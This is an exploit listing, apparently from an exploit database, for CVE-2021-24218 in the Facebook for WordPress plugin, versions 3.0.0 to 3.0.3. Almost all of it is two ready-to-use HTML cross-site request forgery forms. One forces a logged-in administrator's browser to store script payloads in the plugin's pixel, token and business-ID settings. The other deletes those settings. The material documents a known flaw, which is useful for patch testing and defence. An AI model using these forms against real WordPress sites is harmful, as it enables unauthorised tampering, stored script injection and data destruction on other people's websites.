Exploit for Facebook for WordPress 3.0.0-3.0.3 - CSRF to Stored XSS and Settings Deletion CVE-2021-24218

Name: Exploit for Facebook for WordPress 3.0.0-3.0.3 - CSRF to Stored XSS and Settings Deletion CVE-2021-24218
Rating: 5 (102 reviews)

2021-03-25 | CVSS 6.8

## https://sploitus.com/exploit?id=WPEX-ID:169D21FC-D191-46FF-82E8-9AC887AED8A4
CSRF to XSS
<html>
  <body>
    <form action="[TARGETSITE]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="save_fbe_settings" />
      <input type="hidden" name="pixelId" value="<script>alert(0)</script>" />
      <input type="hidden" name="accessToken" value="<script>alert(0)</script>" />
      <input type="hidden" name="externalBusinessId" value="<script>alert(0)</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

CSRF to Delete settings
<html>
  <body>
    <form action="[TARGETSITE]/wp-admin/admin-ajax.php">
      <input type="hidden" name="action" value="delete_fbe_settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>